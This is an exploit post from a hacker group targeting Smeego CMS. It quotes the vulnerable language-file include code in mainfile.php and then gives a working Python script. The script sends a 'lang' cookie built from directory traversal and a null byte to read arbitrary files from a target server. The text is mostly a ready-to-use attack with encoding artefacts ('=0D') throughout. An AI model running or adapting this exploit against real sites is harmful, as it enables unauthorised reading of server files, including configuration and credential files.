|
# Smeego CMS Local File Include Exploit=0D
# by=0D
# 0in from Dark-Coders Programming & Security Group=0D
# >>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<<=0D
#--------------------------------------------------------=0D
# Contact: 0in(dot)email[at]gmail(dot)com=0D
#--------------------------------------------------------=0D
# Greetings to: Die_Angel,suN8Hclf,m4r1usz,djlinux,doctor=0D
#--------------------------------------------------------=0D
# Description:=0D
# Smeego is a Content Management System or Portal=0D
# System written in PHP and designed to be=0D
# easy to install and use. Smeego has a mature code =0D
# and comes with cool modules and themes =0D
# for you to start your own dynamic and database =0D
# driven website. Bla bla Bla [...]=0D
# -------------------------------------------------------=0D
# Script home: http://smeego.com=0D
# -------------------------------------------------------=0D
# Vuln:=0D
# >>>>>> File: mainfile.php <<<<<<<=0D
#if ($display_errors == 1) { // We don't se any errors ;(=0D
# @ini_set('display_errors', 1);=0D
#} else {=0D
# @ini_set('display_errors', 0);=0D
#}=0D
#=0D
#if (isset($newlang)) {=0D
#=0D
# if (file_exists("language/lang-".$newlang.".php")) {=0D
# setcookie("lang",$newlang,time()+31536000);=0D
# include_once("language/lang-".$newlang.".php");=0D
# $currentlang = $newlang;=0D
# } else {=0D
# setcookie("lang",$language,time()+31536000);=0D
# include_once("language/lang-".$language.".php");=0D
# $currentlang = $language;=0D
# }=0D
#} elseif (isset($lang)) {=0D
#=0D
# include_once("language/lang-".$lang.".php");=0D
# $currentlang = $lang;=0D
#} else {=0D
# setcookie("lang",$language,time()+31536000);=0D
# include_once("language/lang-".$language.".php");=0D
# $currentlang = $language;=0D
#}=0D
# >>>>>> End <<<<<<<=0D
# So.. We can send Cookie: lang=[lfi]=0D
=0D
# -------------------------------------------------------=0D
=0D
# Simple Python Exploit:=0D
=0D
#!/usr/bin/python=0D
import sys=0D
import time=0D
import httplib=0D
print '====================================================='=0D
print ' Smeego CMS Local File INclude Exploit '=0D
print ' by '=0D
print ' 0in from Dark-Coders Programming & Security Group! '=0D
print ' http://dark-coders.4rh.eu '=0D
print '====================================================='=0D
try:=0D
target=sys.argv[1]=0D
path=sys.argv[2]=0D
file=sys.argv[3]=0D
except Exception:=0D
print '\nUse: %s [target] [path] [file]' % sys.argv[0]=0D
quit()=0D
i=0=0D
lfi='../'=0D
target+=":80"=0D
special="%00"=0D
file+=special=0D
for i in range(9):=0D
lfi+="../"=0D
print '---------------------------------------------------------'=0D
mysock=httplib.HTTPConnection(target)=0D
mysock=httplib.HTTPConnection(target)=0D
mysock.putrequest("GET",path)=0D
mysock.putheader("User-Agent","Billy Explorer v666")=0D
mysock.putheader('Accept', 'text/html')=0D
mysock.putheader('Accept-Language',' en-us,en;q=0.5')=0D
mysock.putheader('Cookie','lang=%s%s' % (lfi,file))=0D
mysock.endheaders()=0D
reply=mysock.getresponse()=0D
print reply.read()=0D
time.sleep(2)=0D
mysock.close()=0D
print '----------------------------------------------------------'=0D
=0D
#EOFF